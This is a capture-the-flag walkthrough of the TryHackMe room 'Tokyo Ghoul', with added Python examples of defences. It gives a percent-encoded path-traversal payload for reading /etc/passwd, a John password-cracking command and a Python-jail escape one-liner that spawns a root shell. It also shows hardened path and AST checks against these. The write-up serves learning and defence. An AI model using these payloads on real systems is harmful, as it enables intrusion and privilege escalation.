TryHackMe: Tokyo Ghoul

Today we will take a look at the TryHackMe room Tokyo Ghoul. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes. Then you can start watching the anime. ;)

Recon

Task 1: About the room

# Read the above

> No answer needed

# Deploy the machine

> No answer needed

Task 2: Where am i ?

# Use nmap to scan all ports

Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP

## Note that without -p- nmap only probes the 1000 most common TCP ports, so "all ports" really needs -p-. A quick full sweep first (nmap -p- $IP) followed by -sC -sV against only the ports found open is faster than combining everything in one run.

# How many ports are open ?

> *

# What is the OS used ?

> U*****

Task 3: Planning to escape

# Did you find the note that the other ghouls gave you? Where did you find it?

> j********.****

# What is the key for Rize executable?

## Let's check the FTP service and download the files inside

Command: ftp $IP

## Let's look at the files.

## Here we see an ELF (Executable and Linkable Format) binary.

## Make it executable and run it (sudo is not needed for a file we own)

Command: chmod +x need_to_talk

Command: ./need_to_talk

## Dump the printable strings from the binary; the key is stored in it as plaintext

Command: strings need_to_talk

> k********

# Use a tool to get the other note from Rize.

## Run the binary again, this time supplying the key we just found; it hands us the passphrase.

## Now extract the note hidden in the picture with that passphrase (steghide will prompt for it)

Command: steghide extract -sf rize_and_kaneki.jpg

Task 4: What is Rize trying to say?

# What does the message mean? Did you understand it? What does it say?

## When we open the text file, we are greeted by Morse code.

## Let's decode it.

## The result is still encoded, and in more than one layer. We do not know at first glance what the encodings are, so we turn to CyberChef, whose Magic operation guesses them for us.

> d***************
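The "mixed codes" step above is what CyberChef's Magic does for you: decode the Morse, then keep peeling off whichever encoding the current text looks like until nothing plausible decodes any further. The script below is an added example, not code from the writeup or from the room; the Morse sample is constructed for this post (it wraps hex around base64 around a short word) and is not the room's ciphertext, the hex-then-base64 order is just what the constructed sample uses, and "/" as the word separator is an assumption about how the Morse was written.

```python
import base64
import binascii
import string

# International Morse for letters and digits (enough for hex and base64 text).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# Constructed sample (not the room's note): Morse of the hex encoding of
# base64("ghoul"), i.e. three layers deep.
SAMPLE_MORSE = "..... .- ...-- ..--- -.... ---.. --... -.... -.... ....- ..... --... --... --... ...-- -.."


def morse_decode(text):
    """Letters are separated by spaces, words by '/' (assumption). Unknown symbols become '?'."""
    words = []
    for word in text.strip().split("/"):
        words.append("".join(MORSE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


def _printable(data):
    """Return the text if the bytes are printable ASCII, otherwise None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in string.printable for c in text) else None


def _try_hex(s):
    if len(s) % 2 or not all(c in string.hexdigits for c in s):
        return None
    return _printable(bytes.fromhex(s))


def _try_base64(s):
    alphabet = string.ascii_letters + string.digits + "+/="
    if len(s) % 4 or not all(c in alphabet for c in s):
        return None
    try:
        return _printable(base64.b64decode(s, validate=True))
    except (binascii.Error, ValueError):
        return None


def peel_layers(s):
    """Return [(layer_name, decoded_text), ...], stopping when no decoder yields printable text."""
    layers = []
    while True:
        for name, decoder in (("hex", _try_hex), ("base64", _try_base64)):
            out = decoder(s)
            if out is not None and out != s:
                layers.append((name, out))
                s = out
                break
        else:
            return layers


def decode_message(morse):
    """Full chain: Morse first, then whatever encodings are stacked underneath."""
    text = morse_decode(morse)
    return [("morse", text)] + peel_layers(text)


if __name__ == "__main__":
    for name, value in decode_message(SAMPLE_MORSE):
        print(f"{name:7}: {value}")
```

The "printable result" rule is the same heuristic CyberChef relies on: a string like "dead" is valid hex and valid base64, so each candidate decoding is only accepted if it produces readable text, and you should still eyeball the final layer rather than trust the chain blindly.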

# Can you see the weakness in the dark? No? Just search.

## Let's enumerate the directory we just found

Command: gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

## The new page gives us a choice; I checked both and they lead to the same place.

# Did you find something? Crack it

## The page takes a file parameter, so I tried a plain LFI payload, but the page rejected it.

## So we need to bypass the filter. Let's do some research.

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt

## The URL-encoded traversal below gets through: %2e is the percent-encoded form of ".", so a filter that looks for the literal "../" in the request before it is decoded never sees anything to block.

## /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

## I’m not silly dude ;)
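To see why the percent-encoded payload works and what a correct check looks like, here is an added example (mine, not the room's source, which we never see): a hypothetical file-serving handler that blocklists "../" on the raw parameter and only URL-decodes afterwards, next to a hardened version that decodes first, canonicalises the path and then enforces that it stays under the document root. The document root /var/www/html and the way the handler joins the parameter onto it are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root of the hypothetical vulnerable page (not taken from the room).
WEB_ROOT = "/var/www/html"

# The traversal payload quoted in the writeup: every "." is percent-encoded as %2e.
ENCODED_PAYLOAD = "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"


def _join_under_root(decoded):
    """Map the user-supplied path onto the document root and collapse '.' and '..' segments."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))


def naive_resolve(raw_param):
    """Vulnerable pattern: blocklist the raw query value, then URL-decode it.

    Returns the path the handler would open, or None if the blocklist fired.
    """
    if "../" in raw_param:
        return None                      # the "nice try" branch
    decoded = unquote(raw_param)         # %2e%2e/ only becomes ../ here, after the check
    return _join_under_root(decoded)


def safe_resolve(raw_param):
    """Hardened version: decode first, canonicalise, then enforce containment.

    The decision is made on the canonical absolute path, not by hunting for
    '../' substrings, so encoding tricks have nothing left to hide behind.
    """
    decoded = unquote(raw_param)
    candidate = _join_under_root(decoded)
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None                      # escaped the document root
    return candidate


if __name__ == "__main__":
    for label, resolve in (("naive", naive_resolve), ("safe", safe_resolve)):
        print(f"{label:5} ../../etc/passwd -> {resolve('../../etc/passwd')}")
        print(f"{label:5} %2e payload      -> {resolve(ENCODED_PAYLOAD)}")
        print(f"{label:5} index.php        -> {resolve('index.php')}")
```

On a real server the containment check should run on os.path.realpath of the candidate so symlinks inside the web root cannot point outside it, and better still the parameter should select from an allowlist of page names rather than be used as a path at all.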

# What is Rize's username?

> k********

# What is Rize's password?

## Save the hash we found to a file and crack it with John and the rockyou list.

Command: john hash --wordlist=/usr/share/wordlists/rockyou.txt

> p**********

Task 5: Fight Jason

# user.txt

## Let's connect over SSH with the cracked credentials.

Command: ssh username@$IP

# root.txt

## List the commands this user is allowed to run with sudo

Command: sudo -l

## We see a restricted Python "jail" script that we can run as root. After some research, I found a bypass. It works because the jail blocks keywords such as import by scanning the submitted text: the uppercase strings below only turn into those keywords at runtime, after the check has already passed

Command: __builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')

## And now we are root
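The room's jail script is not reproduced in the writeup, so the following is an added example of mine that models what the .lower() trick exploits: a toy keyword blocklist (the word list is an assumption) applied to the source text, the writeup's payload passing through it untouched, and a stronger check that parses the expression and rejects dunder names, which the payload cannot avoid. The bypass is evaluated without the trailing ('/bin/bash') call, so it returns the pty.spawn function instead of actually spawning a shell.

```python
import ast
import builtins

# Toy blocklist standing in for the room's jail; its real rules are not shown in the writeup.
BLOCKED_WORDS = ("import", "pty", "spawn", "system", "subprocess", "open", "exec", "eval")

# Straightforward attempt: every blocked word appears literally in the source.
NAIVE_PAYLOAD = "__import__('pty').spawn('/bin/bash')"

# The writeup's bypass, minus the final ('/bin/bash') call so the demo returns the
# function instead of spawning a root shell.
BYPASS_PAYLOAD = (
    "__builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower())"
    ".__dict__['SPAWN'.lower()]"
)


def text_jail_allows(src):
    """Case-sensitive substring blocklist on the submitted source, as the jail apparently does."""
    return not any(word in src for word in BLOCKED_WORDS)


def run_in_text_jail(src):
    """Evaluate src if the text filter passes; __builtins__ is the real module, as in a script."""
    if not text_jail_allows(src):
        raise PermissionError("blocked by keyword filter")
    return eval(src, {"__builtins__": builtins})


def ast_jail_allows(src):
    """Stronger check: parse the expression and reject any dunder name, attribute or string.

    The .lower() trick hides the keywords from a text scan, but the expression still has
    to reference __builtins__ and __dict__ (and spell out '__IMPORT__'), and those are
    plainly visible once the source is parsed instead of grepped.
    """
    try:
        tree = ast.parse(src, mode="eval")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            ident = node.id
        elif isinstance(node, ast.Attribute):
            ident = node.attr
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            ident = node.value
        else:
            continue
        if ident.startswith("__") and ident.endswith("__"):
            return False
    return True


if __name__ == "__main__":
    print("text filter, naive payload :", text_jail_allows(NAIVE_PAYLOAD))    # False
    print("text filter, bypass payload:", text_jail_allows(BYPASS_PAYLOAD))   # True
    print("bypass evaluates to        :", run_in_text_jail(BYPASS_PAYLOAD))   # pty.spawn
    print("ast filter, bypass payload :", ast_jail_allows(BYPASS_PAYLOAD))    # False
```

A case-insensitive text scan would catch this particular payload, but not the same names assembled with chr() or string concatenation; the only robust fix is to stop evaluating user-supplied Python as root at all, with an AST allowlist as the fallback when some expression evaluation is genuinely required.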

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
